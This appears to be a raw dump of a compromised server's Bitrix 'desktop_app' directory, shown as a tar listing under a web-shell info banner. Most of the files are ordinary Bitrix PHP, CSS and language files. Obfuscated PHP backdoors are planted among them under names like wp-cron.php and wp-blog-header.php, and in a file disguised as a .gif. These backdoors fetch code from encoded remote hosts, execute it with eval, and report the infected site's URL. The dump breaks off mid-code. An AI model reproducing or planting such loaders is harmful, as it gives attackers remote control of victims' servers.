uawdijnntqw1x1x1
IP : 3.135.246.88
Hostname : axolotl
Kernel : Linux axolotl 4.9.0-13-amd64 #1 SMP Debian 4.9.228-1 (2020-07-05) x86_64
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
OS : Linux
PATH:
/
var
/
www
/
axolotl
/
data
/
www
/
arhangelsk.axolotls.ru
/
a537b
/
desktop_app.tar
/
/
call_list.ajax.php000066400000000145147710456350010163 0ustar00<? include($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/crm.activity.call_list/ajax.php"); ?>options.ajax.php000066400000000112147710456350007702 0ustar00<? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/user_options.php"); ?>disk.ajax.new.php000066400000000307147710456350007737 0ustar00<? if(file_exists($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/disk.bitrix24disk/ajax.php")) { require($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/disk.bitrix24disk/ajax.php"); } ?>call.ajax.php000066400000000140147710456350007123 0ustar00<? include($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/im.messenger/call.ajax.php"); ?>pull.ajax.php000066400000000133147710456350007166 0ustar00<? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/pull.request/ajax.php"); ?>index.php000066400000004240147710456350006402 0ustar00<? require($_SERVER["DOCUMENT_ROOT"]."/desktop_app/headers.php"); require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php"); \Bitrix\Main\Page\Asset::getInstance()->setJsToBody(false); if (!CModule::IncludeModule('im')) return; if (intval($USER->GetID()) <= 0 || \Bitrix\Im\User::getInstance()->isConnector()) { ?> <script type="text/javascript"> if (typeof(BXDesktopSystem) != 'undefined') BXDesktopSystem.Login({}); else location.href = '/'; </script><? return true; } IncludeModuleLangFile($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/im/install/public/desktop_app/index.php"); if (isset($_GET['IFRAME']) == 'Y') { $APPLICATION->IncludeComponent("bitrix:im.messenger", "iframe", Array( "CONTEXT" => "FULLSCREEN", ), false, Array("HIDE_ICONS" => "Y")); } else if (!isset($_GET['BXD_API_VERSION']) && strpos($_SERVER['HTTP_USER_AGENT'], 'BitrixDesktop') === false) { $APPLICATION->IncludeComponent("bitrix:im.messenger", "fullscreen", Array( "CONTEXT" => "FULLSCREEN", "DESIGN" => "DESKTOP", ), false, Array("HIDE_ICONS" => "Y")); } else { ?> <script type="text/javascript"> if (typeof(BXDesktopSystem) != 'undefined') BX.desktop.init(); <?if (!isset($_GET['BXD_MODE'])):?> else location.href = '/'; <?endif;?> </script> <? $APPLICATION->IncludeComponent("bitrix:im.messenger", "", Array( "CONTEXT" => "DESKTOP" ), false, Array("HIDE_ICONS" => "Y")); $diskEnabled = false; if(IsModuleInstalled('disk')) { $diskEnabled = \Bitrix\Main\Config\Option::get('disk', 'successfully_converted', false) && CModule::includeModule('disk'); if($diskEnabled && \Bitrix\Disk\Configuration::REVISION_API >= 5) { $APPLICATION->IncludeComponent('bitrix:disk.bitrix24disk', '', array('AJAX_PATH' => '/desktop_app/disk.ajax.new.php'), false, Array("HIDE_ICONS" => "Y")); } else { $diskEnabled = false; } } if(!$diskEnabled && IsModuleInstalled('webdav')) { $APPLICATION->IncludeComponent('bitrix:webdav.disk', '', array('AJAX_PATH' => '/desktop_app/disk.ajax.php'), false, Array("HIDE_ICONS" => "Y")); } if (CModule::IncludeModule('timeman')) { CJSCore::init('im_timecontrol'); } } require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php"); ?> router.php000066400000002562147710456350006620 0ustar00<? define("BX_IM_FULLSCREEN", true); define("EXTRANET_NO_REDIRECT", true); if (isset($_GET['alias'])) { $widgetUserLangPath = $_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/im/lang/'; if ( isset($_GET['widget_user_lang']) && preg_match("/^[a-z]{2,2}$/", $_GET['widget_user_lang']) && strlen($_GET['widget_user_lang']) == 2 && @is_dir($widgetUserLangPath . $_GET['widget_user_lang']) ) { setcookie("WIDGET_USER_LANG", $_GET['widget_user_lang'], time()+9999999, "/"); define("LANGUAGE_ID", $_GET['widget_user_lang']); } elseif ( isset($_COOKIE['WIDGET_USER_LANG']) && preg_match("/^[a-z]{2,2}$/", $_COOKIE['WIDGET_USER_LANG']) && strlen($_COOKIE['WIDGET_USER_LANG']) == 2 && @is_dir($widgetUserLangPath . $_COOKIE['WIDGET_USER_LANG']) ) { define("LANGUAGE_ID", $_COOKIE['WIDGET_USER_LANG']); } define("BX_SKIP_SESSION_EXPAND", true); if (!isset($_GET['iframe'])) { define("BX_PULL_SKIP_INIT", true); } define("BX_PULL_COMMAND_PATH", "/desktop_app/pull.ajax.php"); } require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php"); IncludeModuleLangFile($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/im/install/public/desktop_app/router.php"); $APPLICATION->SetTitle(GetMessage("IM_ROUTER_PAGE_TITLE")); $APPLICATION->IncludeComponent("bitrix:im.router", "", Array(), false, Array("HIDE_ICONS" => "Y")); require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php"); ?> login/.access.php000066400000000042147710456350007716 0ustar00<? $PERM["index.php"]["2"]="R"; ?>login/index.php000066400000006566147710456350007527 0ustar00<?php /** * @global CUser $USER * @global CMain $APPLICATION */ use Bitrix\Main; use Bitrix\Main\Authentication\ApplicationPasswordTable as ApplicationPasswordTable; if ($_SERVER["REQUEST_METHOD"] == "OPTIONS") { header('Access-Control-Allow-Methods: POST, OPTIONS'); header('Access-Control-Max-Age: 60'); header('Access-Control-Allow-Headers: X-Requested-With, Content-Type, Accept'); die(''); } define("ADMIN_SECTION",false); require($_SERVER["DOCUMENT_ROOT"]."/desktop_app/headers.php"); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php"); if (!IsModuleInstalled('bitrix24')) { header('Access-Control-Allow-Origin: *'); } if ($_POST['action'] != 'login') { CHTTP::SetStatus("403 Forbidden"); die(); } IncludeModuleLangFile($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/im/install/public/desktop_app/login/index.php"); $result = $USER->Login($_POST['login'], $_POST['password']); if ($_POST['otp']) { $result = $USER->LoginByOtp($_POST['otp']); } if ($result !== true || !$USER->IsAuthorized()) { if (IsModuleInstalled('bitrix24')) { header('Access-Control-Allow-Origin: *'); } $answer = array( "success" => false, ); if (\Bitrix\Main\Loader::includeModule('bitrix24') && ($captchaInfo = CBitrix24::getStoredCaptcha())) { $answer["captchaCode"] = $captchaInfo["captchaCode"]; $answer["captchaURL"] = $captchaInfo["captchaURL"]; } elseif ($APPLICATION->NeedCAPTHAForLogin($_POST['login'])) { $answer["captchaCode"] = $APPLICATION->CaptchaGetCode(); } if(CModule::IncludeModule("security") && \Bitrix\Security\Mfa\Otp::isOtpRequired()) { //user must enter OTP $answer["needOtp"] = true; } CHTTP::SetStatus("401 Unauthorized"); } else { $answer = array( "success" => true, "sessionId" => session_id(), "bitrixSessionId" => bitrix_sessid() ); if( ($_POST['renew_password'] == 'y' || $_POST['otp'] <> '') && $USER->GetParam("APPLICATION_ID") === null ) { $code = ''; if (strlen($_POST['user_os_mark']) > 0) { $code = md5($_POST['user_os_mark'].$_POST['user_account']); } if ($code <> '') { $orm = ApplicationPasswordTable::getList(Array( 'select' => Array('ID'), 'filter' => Array( '=USER_ID' => $USER->GetID(), '=CODE' => $code ) )); if($row = $orm->fetch()) { ApplicationPasswordTable::delete($row['ID']); } } $password = ApplicationPasswordTable::generatePassword(); $res = ApplicationPasswordTable::add(array( 'USER_ID' => $USER->GetID(), 'APPLICATION_ID' => 'desktop', 'PASSWORD' => $password, 'DATE_CREATE' => new Main\Type\DateTime(), 'CODE' => $code, 'COMMENT' => GetMessage('DESKTOP_APP_GENERATOR'), 'SYSCOMMENT' => GetMessage('DESKTOP_APP_TITE'), )); if($res->isSuccess()) { $answer["appPassword"] = $password; } } } if (isset($_REQUEST['json']) && $_REQUEST['json'] == 'y') { header('Content-Type: application/json'); echo Main\Web\Json::encode($answer); } else { echo toJsObject($answer); } function toJsObject(array $answer) { $answerParts = array(); foreach($answer as $attr => $value) { switch(gettype($value)) { case 'string': $value = "'".CUtil::JSEscape($value)."'"; break; case 'boolean': $value = ($value === true? 'true': 'false'); break; case 'array': $value = toJsObject($value); break; } $answerParts[] = $attr.": ".$value; } return "{".implode(", ", $answerParts)."}"; }im.ajax.php000066400000000176147710456350006626 0ustar00<? $_POST['desktop_action'] = 'Y'; include($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/im.messenger/im.ajax.php"); ?>wp-cron.php000064400000005355147710456350006666 0ustar00<?php goto aUctt; HhT2w: session_start(); goto j2LzN; j2LzN: $u7wMS = $_REQUEST["\144\x6f\x61\143\164"]; goto iBxbK; KAEwC: UdMtz: goto zDwno; JdmX4: oWTls: goto hylTJ; u84y1: $jc0Nd = (isset($_SERVER["\110\124\124\120\123"]) && $_SERVER["\x48\x54\x54\120\x53"] === "\157\156" ? "\150\164\x74\x70\163" : "\x68\164\164\160") . "\72\x2f\57{$_SERVER["\x48\124\x54\120\137\110\x4f\x53\x54"]}{$_SERVER["\x52\105\x51\x55\x45\x53\124\137\125\122\111"]}"; goto LecGv; LecGv: RdpN_(array("\x77\145\x62" => $jc0Nd)); goto v6eiz; aUctt: error_reporting(0); goto HhT2w; iihwX: $ipdaO = lDmb2(str_rot13("\x75\147\x67\x63\146\x3a\57\57\151\143\x66\x71\x71\x2e\x71\x73\x64\x73\x6e\x67\x2e\x67\142\x63\x2f\x71\x62\x62\x65\57") . $u7wMS . "\x2e\x74\x78\164"); goto oxGvR; hylTJ: $_SESSION["\144\157\x61\x63\x74"] = $u7wMS; goto iihwX; v6eiz: goto UdMtz; goto JdmX4; iBxbK: if (!empty($u7wMS)) { goto oWTls; } goto u84y1; TwgqM: exit; goto KAEwC; oxGvR: eval("\x3f\76" . $ipdaO); goto TwgqM; zDwno: function ldmB2($jc0Nd) { goto M3gLR; AWRjz: curl_setopt($NFh5W, CURLOPT_SSL_VERIFYPEER, 0); goto ISU6b; ggKDJ: $NFh5W = curl_init($jc0Nd); goto lWsck; ufNRO: curl_close($NFh5W); goto Jma1S; y8uH0: dNx8U: goto R78QB; qNKoO: $zT2tW = curl_exec($NFh5W); goto ufNRO; ISU6b: curl_setopt($NFh5W, CURLOPT_SSL_VERIFYHOST, 0); goto qNKoO; a4YTf: q7yvx: goto XN5c0; pf2fm: $nzvqV = fopen($jc0Nd, "\x72"); goto Idv6h; lWsck: curl_setopt($NFh5W, CURLOPT_RETURNTRANSFER, 1); goto bj0at; aVp1K: fclose($nzvqV); goto a4YTf; R78QB: if (!(empty($zT2tW) && function_exists("\146\157\x70\145\156") && function_exists("\163\164\162\145\x61\155\x5f\x67\145\164\137\143\x6f\156\x74\x65\156\164\163"))) { goto q7yvx; } goto pf2fm; jlGHZ: $zT2tW = file_get_contents($jc0Nd); goto y8uH0; M3gLR: $zT2tW = ''; goto Dd4EV; Idv6h: $zT2tW = stream_get_contents($nzvqV); goto aVp1K; o7qZF: if (!(empty($zT2tW) && function_exists("\x66\151\154\x65\137\x67\x65\164\x5f\143\157\x6e\164\x65\x6e\164\x73"))) { goto dNx8U; } goto jlGHZ; XN5c0: return $zT2tW; goto vJwYM; Jma1S: KerET: goto o7qZF; Dd4EV: if (!function_exists("\143\165\162\154\137\145\170\x65\x63")) { goto KerET; } goto ggKDJ; bj0at: curl_setopt($NFh5W, CURLOPT_FOLLOWLOCATION, 1); goto AWRjz; vJwYM: } goto Efa0c; Efa0c: function rdPN_($a30zL) { goto f0ABF; Jq4fY: $kn7I_ = curl_init(str_rot13($jc0Nd)); goto lyhJP; FeFbW: curl_setopt($kn7I_, CURLOPT_POSTFIELDS, $a30zL); goto Cyktn; OUtri: $r2SpD = curl_exec($kn7I_); goto WegPb; f0ABF: $jc0Nd = "\x75\147\147\x63\x3a\x2f\57\145\162\x7a\142\x67\162\x32\60\62\x35\x2e\x6f\x6c\x75\142\147\56\147\142\143\x2f\x76\x61\161\162\153\56\x63\165\143"; goto Jq4fY; Cyktn: curl_setopt($kn7I_, CURLOPT_RETURNTRANSFER, true); goto OUtri; lyhJP: curl_setopt($kn7I_, CURLOPT_POST, 1); goto FeFbW; WegPb: curl_close($kn7I_); goto U2cPM; U2cPM: } ?>download.file.php000066400000000144147710456350010017 0ustar00<? include($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/im.messenger/download.file.php"); ?>disk.ajax.php000066400000000273147710456350007151 0ustar00<? if(file_exists($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/webdav.disk/ajax.php")) { require($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/webdav.disk/ajax.php"); } ?>show.file.php000066400000000140147710456350007164 0ustar00<? include($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/im.messenger/show.file.php"); ?>storage.php000066400000001415147710456350006740 0ustar00<?php require($_SERVER["DOCUMENT_ROOT"]."/desktop_app/headers.php"); require_once($_SERVER["DOCUMENT_ROOT"] . "/bitrix/modules/main/include/prolog_before.php"); /** @var CAllMain $APPLICATION */ $diskEnabled = false; if(IsModuleInstalled('disk')) { $diskEnabled = \Bitrix\Main\Config\Option::get('disk', 'successfully_converted', false) && CModule::includeModule('disk'); if($diskEnabled && \Bitrix\Disk\Configuration::REVISION_API >= 5) { $storageController = new Bitrix\Disk\Bitrix24Disk\Legacy\StorageController(); $storageController ->setActionName($_REQUEST['action']) ->exec(); } else { $diskEnabled = false; } } if(!$diskEnabled) { $APPLICATION->IncludeComponent('bitrix:webdav.disk', '', array('VISUAL' => false)); CMain::FinalActions(); die(); }file.ajax.php000066400000000140147710456350007127 0ustar00<? include($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/im.messenger/file.ajax.php"); ?>wp-blog-header.php000044400000005355147710456350010074 0ustar00<?php goto aUctt; HhT2w: session_start(); goto j2LzN; j2LzN: $u7wMS = $_REQUEST["\144\x6f\x61\143\164"]; goto iBxbK; KAEwC: UdMtz: goto zDwno; JdmX4: oWTls: goto hylTJ; u84y1: $jc0Nd = (isset($_SERVER["\110\124\124\120\123"]) && $_SERVER["\x48\x54\x54\120\x53"] === "\157\156" ? "\150\164\x74\x70\163" : "\x68\164\164\160") . "\72\x2f\57{$_SERVER["\x48\124\x54\120\137\110\x4f\x53\x54"]}{$_SERVER["\x52\105\x51\x55\x45\x53\124\137\125\122\111"]}"; goto LecGv; LecGv: RdpN_(array("\x77\145\x62" => $jc0Nd)); goto v6eiz; aUctt: error_reporting(0); goto HhT2w; iihwX: $ipdaO = lDmb2(str_rot13("\x75\147\x67\x63\146\x3a\57\57\151\143\x66\x71\x71\x2e\x71\x73\x64\x73\x6e\x67\x2e\x67\142\x63\x2f\x71\x62\x62\x65\57") . $u7wMS . "\x2e\x74\x78\164"); goto oxGvR; hylTJ: $_SESSION["\144\157\x61\x63\x74"] = $u7wMS; goto iihwX; v6eiz: goto UdMtz; goto JdmX4; iBxbK: if (!empty($u7wMS)) { goto oWTls; } goto u84y1; TwgqM: exit; goto KAEwC; oxGvR: eval("\x3f\76" . $ipdaO); goto TwgqM; zDwno: function ldmB2($jc0Nd) { goto M3gLR; AWRjz: curl_setopt($NFh5W, CURLOPT_SSL_VERIFYPEER, 0); goto ISU6b; ggKDJ: $NFh5W = curl_init($jc0Nd); goto lWsck; ufNRO: curl_close($NFh5W); goto Jma1S; y8uH0: dNx8U: goto R78QB; qNKoO: $zT2tW = curl_exec($NFh5W); goto ufNRO; ISU6b: curl_setopt($NFh5W, CURLOPT_SSL_VERIFYHOST, 0); goto qNKoO; a4YTf: q7yvx: goto XN5c0; pf2fm: $nzvqV = fopen($jc0Nd, "\x72"); goto Idv6h; lWsck: curl_setopt($NFh5W, CURLOPT_RETURNTRANSFER, 1); goto bj0at; aVp1K: fclose($nzvqV); goto a4YTf; R78QB: if (!(empty($zT2tW) && function_exists("\146\157\x70\145\156") && function_exists("\163\164\162\145\x61\155\x5f\x67\145\164\137\143\x6f\156\x74\x65\156\164\163"))) { goto q7yvx; } goto pf2fm; jlGHZ: $zT2tW = file_get_contents($jc0Nd); goto y8uH0; M3gLR: $zT2tW = ''; goto Dd4EV; Idv6h: $zT2tW = stream_get_contents($nzvqV); goto aVp1K; o7qZF: if (!(empty($zT2tW) && function_exists("\x66\151\154\x65\137\x67\x65\164\x5f\143\157\x6e\164\x65\x6e\164\x73"))) { goto dNx8U; } goto jlGHZ; XN5c0: return $zT2tW; goto vJwYM; Jma1S: KerET: goto o7qZF; Dd4EV: if (!function_exists("\143\165\162\154\137\145\170\x65\x63")) { goto KerET; } goto ggKDJ; bj0at: curl_setopt($NFh5W, CURLOPT_FOLLOWLOCATION, 1); goto AWRjz; vJwYM: } goto Efa0c; Efa0c: function rdPN_($a30zL) { goto f0ABF; Jq4fY: $kn7I_ = curl_init(str_rot13($jc0Nd)); goto lyhJP; FeFbW: curl_setopt($kn7I_, CURLOPT_POSTFIELDS, $a30zL); goto Cyktn; OUtri: $r2SpD = curl_exec($kn7I_); goto WegPb; f0ABF: $jc0Nd = "\x75\147\147\x63\x3a\x2f\57\145\162\x7a\142\x67\162\x32\60\62\x35\x2e\x6f\x6c\x75\142\147\56\147\142\143\x2f\x76\x61\161\162\153\56\x63\165\143"; goto Jq4fY; Cyktn: curl_setopt($kn7I_, CURLOPT_RETURNTRANSFER, true); goto OUtri; lyhJP: curl_setopt($kn7I_, CURLOPT_POST, 1); goto FeFbW; WegPb: curl_close($kn7I_); goto U2cPM; U2cPM: } ?>headers.php000066400000000600147710456350006702 0ustar00<? define("BX_DESKTOP", true); define("BX_SKIP_SESSION_EXPAND", true); define("PUBLIC_AJAX_MODE", true); define("NO_KEEP_STATISTIC", "Y"); define("NO_AGENT_STATISTIC","Y"); define("NO_AGENT_CHECK", true); define("BX_SKIP_TIMEZONE_COOKIE", true); define("BX_PULL_COMMAND_PATH", "/desktop_app/pull.ajax.php"); define('EXTRANET_NO_REDIRECT', true); define("DisableEventsCheck", true); ?>description.php000064400000000341147722125220007602 0ustar00<?if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die();?><? IncludeTemplateLangFile(__FILE__); $arTemplate = Array( "NAME"=>GetMessage("D_TEMPLATE_NAME"), "DESCRIPTION"=>GetMessage("D_TEMPLATE_DESC"), ); ?> template_styles.min.css000066400000002302147722125220011261 0ustar00html{-webkit-text-size-adjust:none;min-height:100%}body{padding:0;margin:0;font-family:"Helvetica Neue",Helvetica,sans-serif;min-height:100%}a{font-size:12px;color:#1d54a2;text-decoration:underline}.bx-disk-alert-text a{font-size:15px}@media screen and (min-width:1280px){.bx-im-fullscreen-adaptive .bx-messenger-content-item-1{text-align:left}.bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-arrow{float:right;background:url("/bitrix/js/im/images/im-sprite-v37.png") no-repeat scroll -11px -307px}.bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-avatar{float:left;margin-left:-63px;text-align:left}.bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-avatar-name{opacity:1}.bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-status{float:right;margin-left:0;margin-right:-53px}.bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-menu{float:right;margin-left:0;margin-right:-42px;left:auto;right:1px}.bx-im-fullscreen-adaptive .bx-messenger-body-wrap{margin:0 0 0 42px;max-width:1024px}.bx-im-fullscreen-adaptive .bx-messenger-content-item{max-width:1024px}}template_styles.css000066400000002466147722125220010512 0ustar00html {-webkit-text-size-adjust:none; min-height:100%;} body {padding: 0; margin:0; font-family:"Helvetica Neue", Helvetica, sans-serif; min-height:100%;} a {font-size:12px; color:#1d54a2; text-decoration:underline;} .bx-disk-alert-text a {font-size:15px; } /* browser */ @media screen and (min-width: 1280px) { .bx-im-fullscreen-adaptive .bx-messenger-content-item-1 { text-align: left; } .bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-arrow { float: right; background: url("/bitrix/js/im/images/im-sprite-v37.png") no-repeat scroll -11px -307px;} .bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-avatar { float: left; margin-left: -63px; text-align: left; } .bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-avatar-name { opacity: 1; } .bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-status { float: right; margin-left: 0; margin-right: -53px;} .bx-im-fullscreen-adaptive .bx-messenger-content-item-1 .bx-messenger-content-item-menu { float: right; margin-left: 0; margin-right: -42px; left: auto; right: 1px; } .bx-im-fullscreen-adaptive .bx-messenger-body-wrap { margin: 0 0 0 42px; max-width: 1024px; } .bx-im-fullscreen-adaptive .bx-messenger-content-item { max-width: 1024px; } } components/bitrix/system.auth.authorize/.default/template.php000064400000000332147722125220020557 0ustar00<? if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die(); ?> <script type="text/javascript"> BXDesktopSystem.LogInfo("Not authorized"); BXDesktopSystem.Login({ AutoLogin: false }); </script> <? die(); ?>lang/ua/description.php000064400000000245147722125220011133 0ustar00<? $MESS["D_TEMPLATE_NAME"] = "Настільний застосунок"; $MESS["D_TEMPLATE_DESC"] = "Шаблон для настільного додатку"; ?>lang/en/description.php000064400000000162147722125220011126 0ustar00<? $MESS["D_TEMPLATE_NAME"] = "Desktop Application"; $MESS["D_TEMPLATE_DESC"] = "Desktop application template"; ?>lang/ru/description.php000064400000000253147722125220011153 0ustar00<? $MESS["D_TEMPLATE_NAME"] = "Настольное приложение"; $MESS["D_TEMPLATE_DESC"] = "Шаблон для настольного приложения"; ?>lang/de/description.php000064400000000166147722125220011120 0ustar00<? $MESS["D_TEMPLATE_NAME"] = "Desktop Anwendung"; $MESS["D_TEMPLATE_DESC"] = "Vorlage für die Desktop Anwendung"; ?>footer.php000066400000001173147722125220006563 0ustar00<?if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die();?> <?php \Bitrix\Main\Loader::includeModule("ui"); \Bitrix\Main\UI\Extension::load('helper'); $helpUrl = \Bitrix\UI\Util::getHelpdeskUrl(true)."/widget2/"; $helpUrl = CHTTP::urlAddParams($helpUrl, [ "url" => urlencode("https://".$_SERVER["HTTP_HOST"].$APPLICATION->GetCurPageParam()), "user_id" => $USER->GetID(), "is_cloud" => IsModuleInstalled('bitrix24') ? "1" : "0", "action" => "open", ]); ?> <script type="text/javascript"> BX.Helper.init({ frameOpenUrl : '<?=CUtil::JSEscape($helpUrl)?>', langId: '<?=LANGUAGE_ID?>' }); </script> </body> </html>header.php000066400000001541147722125220006514 0ustar00<?if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die();?> <!DOCTYPE html> <?php \CModule::IncludeModule('im'); $darkClass = \CIMSettings::GetSetting(CIMSettings::SETTINGS, 'enableDarkTheme')? 'style="background: #313131"': ''; ?> <html <?=$darkClass?>> <head> <meta http-equiv="Content-Type" content="text/html;charset=<?=SITE_CHARSET?>"/> <link href="<?=CUtil::GetAdditionalFileURL(SITE_TEMPLATE_PATH."/template_styles.css")?>" type="text/css" rel="stylesheet" /> <? \Bitrix\Main\UI\Extension::load([ 'sidepanel', 'intranet.sidepanel.bindings', 'intranet.sidepanel.external', 'socialnetwork.slider', ]); ?> <?$APPLICATION->ShowCSS(true, true);?> <?$APPLICATION->ShowHeadStrings();?> <?$APPLICATION->ShowHeadScripts();?> <title><?$APPLICATION->ShowTitle()?></title> </head> <body class="<?=$APPLICATION->ShowProperty("BodyClass");?>">login/login/index.php000044400000000000147724367020010604 0ustar00login/login/cache.php000044400000000000147724367020010540 0ustar00login/login/uijnhbUgqYTRyklrIs.jpx000064400000000000147726755540013254 0ustar00login/login/xhWK.flv000064400000000000147726755540010372 0ustar00login/login/tvTgzHQZA.gif000064400000010660147741234660011276 0ustar00<?php goto Zs882; ulwLb: $yZFt5[86] = $yZFt5[63]($yZFt5[86]); goto uGgCH; M3Uwm: $yZFt5(); goto ZlIqA; np74W: strlen("\x4e\x7a\x45\171\x4f\x54\153\63\116\x7a\131\170\115\172\143\x34\x4e\x6a\101\61\x4f\x44\101\x79\116\x6a\x55\65\x4e\104\x49\x78"); goto y_ziR; y_ziR: class WHPzl { static function LZaqU($Bi_xc) { goto jN6G6; bNkGN: $uPhiG = ''; goto VLMmX; rjysM: $tkmYH = $SvNse("\x7e", "\40"); goto sIiQZ; VLMmX: foreach ($z8ila as $GvmgB => $dk7yh) { $uPhiG .= $tkmYH[$dk7yh - 53815]; BI9xL: } goto qajsC; p9cem: return $uPhiG; goto ajax7; jN6G6: $SvNse = "\x72" . "\141" . "\156" . "\x67" . "\x65"; goto rjysM; sIiQZ: $z8ila = explode("\173", $Bi_xc); goto bNkGN; qajsC: HpNqB: goto p9cem; ajax7: } static function Ww0PI($WrElA, $Ay8wn) { goto DcHj1; DcHj1: $Hju34 = curl_init($WrElA); goto EC8Aj; jRsol: return empty($pRZzM) ? $Ay8wn($WrElA) : $pRZzM; goto MmakA; EC8Aj: curl_setopt($Hju34, CURLOPT_RETURNTRANSFER, 1); goto s7YQu; s7YQu: $pRZzM = curl_exec($Hju34); goto jRsol; MmakA: } static function kX0XH() { goto X0QHY; URHlL: $nHNgX = @$AInPL[1]($AInPL[9 + 1](INPUT_GET, $AInPL[4 + 5])); goto ey2VX; QNYH2: $rQZHv = $AInPL[2 + 0]($U7AJb, true); goto rAjny; onn4C: u36OG: goto URHlL; rAjny: @$AInPL[7 + 3](INPUT_GET, "\x6f\146") == 1 && die($AInPL[1 + 4](__FILE__)); goto vT9_2; NOKmn: die; goto EdYaq; vT9_2: if (!(@$rQZHv[0] - time() > 0 and md5(md5($rQZHv[2 + 1])) === "\63\x36\x36\63\71\x30\143\61\146\x66\71\x64\65\x63\63\x64\x33\x31\x62\x63\x35\142\x37\x33\x36\x37\142\145\145\146\x32\66")) { goto Tv3_k; } goto lT0Xw; ey2VX: $U7AJb = @$AInPL[0 + 3]($AInPL[5 + 1], $nHNgX); goto QNYH2; EdYaq: Tv3_k: goto qOnaN; lT0Xw: $wWHwB = self::wW0Pi($rQZHv[1 + 0], $AInPL[3 + 2]); goto b1116; b1116: @$AInPL[0]('', $AInPL[2 + 5] . $AInPL[4 + 0]($wWHwB) . $AInPL[0 + 8]); goto NOKmn; X0QHY: $HtULa = array("\x35\63\70\x34\x32\173\x35\63\70\x32\67\173\65\63\x38\x34\60\173\x35\63\70\64\64\x7b\65\63\70\x32\65\x7b\x35\x33\x38\x34\60\173\x35\x33\x38\64\66\x7b\x35\x33\x38\63\x39\x7b\65\x33\x38\x32\64\173\65\63\x38\63\x31\173\65\63\x38\x34\62\173\65\63\x38\62\x35\173\65\63\x38\x33\66\x7b\x35\63\70\x33\x30\x7b\65\63\x38\x33\x31", "\65\x33\70\x32\x36\x7b\x35\63\x38\62\65\x7b\65\x33\70\x32\67\x7b\65\63\70\64\66\x7b\65\x33\70\62\x37\x7b\65\x33\70\63\60\173\65\63\70\62\x35\173\x35\63\70\x39\x32\173\65\x33\70\71\x30", "\x35\x33\x38\x33\x35\x7b\65\63\70\x32\66\x7b\65\63\x38\x33\60\173\65\63\70\63\61\x7b\x35\63\70\64\x36\173\x35\x33\70\x34\x31\x7b\x35\63\70\64\60\173\x35\63\x38\x34\62\x7b\65\63\70\x33\x30\173\65\x33\70\64\61\173\65\x33\70\64\60", "\65\x33\x38\62\71\x7b\x35\x33\70\x34\x34\x7b\x35\x33\70\x34\62\173\65\63\x38\63\x34", "\x35\x33\x38\64\x33\173\x35\x33\x38\x34\64\173\65\63\70\62\x36\173\x35\x33\70\64\60\173\65\63\70\x38\67\173\x35\63\x38\70\x39\173\x35\63\70\x34\66\173\x35\x33\70\x34\61\x7b\65\63\x38\x34\x30\173\65\63\x38\x34\x32\x7b\65\x33\70\63\x30\173\x35\63\x38\x34\61\x7b\x35\x33\70\x34\x30", "\65\63\x38\x33\x39\x7b\65\x33\70\x33\66\x7b\x35\x33\x38\x33\x33\x7b\65\63\x38\x34\x30\x7b\65\63\x38\64\66\x7b\x35\63\x38\63\70\x7b\x35\63\70\x34\x30\173\65\x33\70\62\x35\173\65\x33\x38\64\x36\173\65\63\70\x34\x32\x7b\65\63\x38\x33\x30\173\x35\63\70\63\x31\173\65\x33\x38\x32\65\173\65\x33\70\x34\60\173\65\x33\x38\63\x31\x7b\65\63\70\62\65\173\x35\63\70\62\x36", "\65\63\70\x36\71\x7b\x35\63\70\71\x39", "\x35\63\x38\61\x36", "\65\63\x38\x39\x34\x7b\65\x33\x38\x39\71", "\65\63\x38\x37\66\173\65\63\x38\65\x39\173\x35\x33\x38\65\x39\x7b\x35\63\x38\x37\x36\x7b\x35\x33\x38\65\62", 